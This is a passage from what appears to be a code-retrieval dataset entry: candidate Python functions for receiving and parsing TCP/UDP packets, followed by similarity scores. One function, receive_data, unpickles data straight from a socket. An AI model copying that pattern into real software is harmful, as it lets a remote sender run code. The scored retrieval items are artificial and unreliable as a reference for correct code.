self.process_packet(packet, udp_dport)", "def __tcp_recv(self):\n total_data = []\n bs = 1024\n try:\n data = self.__sock.recv(bs)\n total_data.append(data)\n while True and data:\n if not re.search(\"L: (\\d+)\",data) and not data[-4:] == '\\r\\n\\r\\n':\n data = self.__sock.recv(bs)\n total_data.append(data)\n elif not re.search(\"L: (\\d+)\",data) and data[-4:] == '\\r\\n\\r\\n':\n return total_data\n else:\n break\n \n\n while re.search(\"L: (\\d+)\",data):\n n = len(data)\n L = int(re.findall(\"L: (\\d+)\",data)[-1])\n p = data.rfind('\\r\\n\\r\\n')\n abc = data\n data = ''\n\n p1 = data.rfind(str(L))\n if p < p1:\n log(\"rn before L\")\n left = L + n - (p1 + len(str(L))) + 4\n\n else:\n left = L - (n - p -4)\n if left == L:\n log(\"It happened!\")\n break\n\n #if more bytes then last L\n #come across another command: BN etc.\n #read until another L come\n if left < 0:\n log('abc')\n d = ''\n left = 0\n while True:\n d = self.__sock.recv(bs)\n data += d\n if re.search(\"L: (\\d+)\",d):\n break\n log(\"read left bytes\")\n log('data:'+data)\n total_data.append(data)\n\n #read left bytes in last L\n while left:\n data = self.__sock.recv(left)\n n = len(data)\n left = left - n\n\n if not data:\n break\n total_data.append(data)\n\n except socket.error,e:\n #self.__sock.close()\n raise PyFetionSocketError(e)\n\n return self.__split(''.join(total_data))\n\n #return ''.join(total_data)", "def parameters(self):\n return self.pkt.payload[2:]", "def getData(self):\n return struct.unpack(\"!I\",self.data)[0]", "def getData(self):\n return struct.unpack(\"!I\",self.data)[0]", "def handle(self):\n return struct.unpack('<H', self.pkt.payload[0:2])[0]", "def handle(self):\n return struct.unpack('<H', self.pkt.payload[0:2])[0]", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def getData(self):\n return 
struct.unpack(\"!Q\",self.data)[0]", "def getData(self):\n return struct.unpack(\"!Q\",self.data)[0]", "def pull(self):\n \n data = self.s.recv(1024)\n if data:\n info = json.loads(data.decode()) \n print(\"DATA FROM BROKER : \", info)\n \n return info.get(\"topic\"), info.get(\"value\")\n pass", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def __recv_frame(self) -> Dict[str, Any]:\n # Grab a packet\n packets = self.sock.recvfrom(Sniffer.RECEIVE_SIZE)\n address = self.__process_address(packets[1])\n packet = packets[0]\n offset = 0\n\n # Make sure its a valid packet\n eth_header = self.__process_ethframe(packet[offset:(offset + Sniffer.ETH_HEADER_LENGTH)])\n offset = offset + eth_header['header_length']\n\n if eth_header['protocol'] != 8:\n # Not IP\n raise UnknownPacketException(\n 'Unknown frame {}'.format(eth_header['protocol'])\n )\n\n # Get the IP header\n ip_header = self.__process_ipframe(packet[offset:(offset + Sniffer.IP_HEADER_LENGTH)])\n offset = offset + ip_header['header_length']\n\n if ip_header['protocol'] != 6:\n # Not TCP\n raise UnknownPacketException(\n 'Unknown protocol {}'.format(ip_header['protocol']),\n )\n\n # Get TCP header\n tcp_header = self.__process_tcpframe(packet[offset:(offset + Sniffer.TCP_HEADER_LENGTH)])\n offset = offset + tcp_header['header_length']\n\n # Get payload length\n payload_length = ip_header['length'] - ip_header['header_length'] - tcp_header['header_length']\n\n # Get payload\n data = packet[offset:offset + payload_length]\n\n return {\n 'ip_header': ip_header,\n 'tcp_header': tcp_header,\n 'data': data,\n 'address': address,\n }", "def tcp_reassembly(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n bufid=(\n ipaddress.ip_address(ip.src), # source IP address\n ipaddress.ip_address(ip.dst), # destination IP address\n tcp.sport, # source port\n tcp.dport, # destination port\n ),\n num=count, # original packet range number\n ack=tcp.ack, # acknowledgement\n dsn=tcp.seq, # data sequence number\n syn=bool(tcp.flags.S), # synchronise flag\n fin=bool(tcp.flags.F), # finish flag\n rst=bool(tcp.flags.R), # reset connection flag\n payload=bytearray(bytes(tcp.payload)), # raw bytearray type payload\n )\n raw_len = len(tcp.payload) # payload length, header excludes\n data['first'] = tcp.seq # this sequence number\n data['last'] = tcp.seq + raw_len # 
next (wanted) sequence number\n data['len'] = raw_len # payload length, header excludes\n return True, data\n return False, None", "def packetReceived(self, ident, payload):\n pass", "def payload(self) -> \"dict\":\n return self._attrs.get(\"payload\")", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def receive_data():\n\n # Receive the first message (the header),\n # which indicates the incoming data length\n data_length = int(pickle.loads(conn.recv(HEADER_SIZE)))\n \n if data_length:\n # Receive the data itself\n data = pickle.loads(conn.recv(data_length))\n\n return data", "def payload_type(udp_protocol):\n\n\t#if ip_protocol == 17 :\n\t#\tfrom pcapfile.protocols.transport.udp import UDP\n\t#\treturn (UDP, 'UDP')\n\t#elif ip_protocol == 6:\n\t#\tfrom pcapfile.protocols.transport.tcp import TCP\n\t#\treturn (TCP, 'TCP')\n\t#elif ip_protocol == 1:\n\t#\tfrom pcapfile.protocols.transport.tcp import ICMP\n\t#\treturn (ICMP, 'ICMP')\n\t#elif ip_protocol == 41:\n\t#\tfrom pcapfile.protocols.transport.tcp import IPv6\n\t#\treturn (IPv6, 'IPv6')\n\t#elif ip_protocol == 41:\n\t#\tfrom pcapfile.protocols.transport.tcp import IPv6\n\t#\treturn (IPv6, 'IPv6')\n\t#else:\n\treturn (None, 'unknown')" ]
[ "0.8326517", "0.78962934", "0.7087218", "0.6683006", "0.6564376", "0.65308803", "0.6511432", "0.65108025", "0.6451101", "0.63990587", "0.6355475", "0.63496506", "0.6315682", "0.62409586", "0.62407076", "0.6233684", "0.62289816", "0.62234855", "0.61914325", "0.61500925", "0.6145048", "0.6088183", "0.60807586", "0.60699856", "0.6049788", "0.60101044", "0.6006161", "0.59948814", "0.5990619", "0.5967195", "0.59637696", "0.59488165", "0.5932731", "0.5930253", "0.5928488", "0.5909693", "0.5902366", "0.58952624", "0.58848447", "0.5875207", "0.58664894", "0.58340013", "0.5822825", "0.58182865", "0.58147526", "0.581", "0.5804457", "0.5802376", "0.57883406", "0.5780355", "0.57744956", "0.5771437", "0.57632226", "0.5760935", "0.5757017", "0.5746463", "0.5746442", "0.57459176", "0.5721214", "0.5719966", "0.5717378", "0.57159764", "0.57053477", "0.57015705", "0.569355", "0.5691888", "0.567303", "0.5667023", "0.5653561", "0.56491184", "0.5643048", "0.5642235", "0.5638463", "0.5638463", "0.5638463", "0.5631879", "0.5619304", "0.56097114", "0.5601159", "0.5596941", "0.5587796", "0.5585685", "0.5571952", "0.5557289", "0.5550779", "0.5550779", "0.55449945", "0.55449945", "0.5541064", "0.5540483", "0.5540483", "0.55368376", "0.55365944", "0.5531013", "0.5528871", "0.55233943", "0.5515813", "0.55108577", "0.5502363", "0.54957193" ]
0.65222436
6
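For the record just above (query: get the payload below TCP/UDP), a minimal usage sketch of the positive document's payload_from_raw is given here. It is illustrative only and not part of the dataset: it assumes dpkt is installed, that iplayer_from_raw resolves the IP layer for the capture's link type (a plausible companion to the record's code, which does not show it), and that capture.pcap is a hypothetical file name.

import dpkt

def iplayer_from_raw(raw, linktype=1):
    # Assumed helper (not shown in the record): return the IP layer for the
    # given link type; 1 == Ethernet, otherwise treat the bytes as raw IP.
    if linktype == 1:
        return dpkt.ethernet.Ethernet(raw).data
    return dpkt.ip.IP(raw)

def payload_from_raw(raw, linktype=1):
    # As in the record: the payload is whatever sits below the TCP/UDP layer.
    ip = iplayer_from_raw(raw, linktype)
    try:
        return ip.data.data
    except Exception:
        return b""

with open("capture.pcap", "rb") as f:
    pcap = dpkt.pcap.Reader(f)
    for ts, raw in pcap:
        payload = payload_from_raw(raw, linktype=pcap.datalink())
        if payload:
            print(ts, len(payload))

The bare try/except mirrors the record's own code: any frame without an IP/TCP/UDP stack (ARP, non-IP traffic) simply yields an empty payload instead of raising.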
Extract all packets belonging to the same flow from a pcap packet iterator
def next_connection_packets(piter, linktype=1): first_ft = None for ts, raw in piter: ft = flowtuple_from_raw(raw, linktype) if not first_ft: first_ft = ft sip, dip, sport, dport, proto = ft if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)): break yield { "src": sip, "dst": dip, "sport": sport, "dport": dport, "proto": proto, "raw": payload_from_raw(raw, linktype).encode("base64"), "direction": first_ft == ft, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self):\n # outfile = open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def iter_packets(iterable):\n prev = None\n\n for i in sorted(iterable, key=attrgetter('seq')):\n if prev is None or prev.seq != i.seq:\n prev = i\n yield i", "def udp_iterator(pc):\n\tfor time,pkt in pc:\n\t\teth = dpkt.ethernet.Ethernet(pkt)\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t ip = eth.data\n\t\t # if the IP protocol is UDP, process it further\n\t\t if ip.p == dpkt.ip.IP_PROTO_UDP :\n\t\t\tudp = ip.data\n\t\t\tyield( ip.src, udp.sport, ip.dst, udp.dport, udp.data )", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == 
'5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def packets_for_stream(fobj, offset):\n pcap = dpkt.pcap.Reader(fobj)\n pcapiter = iter(pcap)\n ts, raw = pcapiter.next()\n\n fobj.seek(offset)\n for p in next_connection_packets(pcapiter, linktype=pcap.datalink()):\n yield p", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP 
flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()", "def read_pkt_seq(self):\n pkt = self.read_pkt_line()\n while pkt:\n yield pkt\n pkt = self.read_pkt_line()", "def accumulate_packets():\n l = []\n packets = 
sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=printing)\n print(\"Processing packets!\")\n for packet in packets:\n l.append({\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)})\n return l", "def __iter__(self) -> Iterator[packets.Packet]:\n for packet in self._packets:\n yield packet\n for pointer in self._packet_pointers:\n yield pointer.get()", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def get_pcap_traffic_series(self):\n parsed_pcap_data = {}\n\n if (self.mac_address_binary is not None):\n parsed_pcap_data[self.mac_address_binary] = []\n\n with open(self.pcap_file_path, 'rb') as pcap_file:\n try:\n pcap = dpkt.pcap.Reader(pcap_file)\n for ts, buf in pcap:\n # Skip non ethernet frames\n try:\n eth = dpkt.ethernet.Ethernet(buf)\n except:\n continue\n\n # Skip non-IP packets\n if eth.type != 2048:\n continue\n \n # Apply eth filter\n if (self.mac_address_binary is not None):\n self.append_data(parsed_pcap_data, self.mac_address_binary, eth, ts)\n else:\n if (eth.src not in parsed_pcap_data):\n parsed_pcap_data[eth.src] = []\n if (eth.dst not in parsed_pcap_data):\n parsed_pcap_data[eth.dst] = []\n\n self.append_data(parsed_pcap_data, eth.src, eth, ts)\n self.append_data(parsed_pcap_data, eth.dst, eth, ts)\n except:\n print \"Error parsing file: %s\" % pcap_file\n \n # Remove mac addresses that didn't send data\n receivers_only = []\n for mac_addr in parsed_pcap_data:\n data_sent = False\n for data in parsed_pcap_data[mac_addr]:\n if (data[1] > 0):\n data_sent = True\n break\n if (not data_sent):\n receivers_only.append(mac_addr)\n\n for mac_addr in receivers_only:\n parsed_pcap_data.pop(mac_addr, None)\n\n # Sort the data \n for mac_addr in parsed_pcap_data:\n series = sorted(parsed_pcap_data[mac_addr], key=operator.itemgetter(0))\n parsed_pcap_data[mac_addr] = series\n\n return parsed_pcap_data", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n 
max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def parse_pkt_list(self, pkt_list):\n flow_pkts = {}\n for (t, pkt) in pkt_list:\n flowID = self.extract_flowID(pkt)\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(t, pkt)]\n else:\n flow_pkts[flowID].append((t,pkt))\n return flow_pkts", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments 
recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target 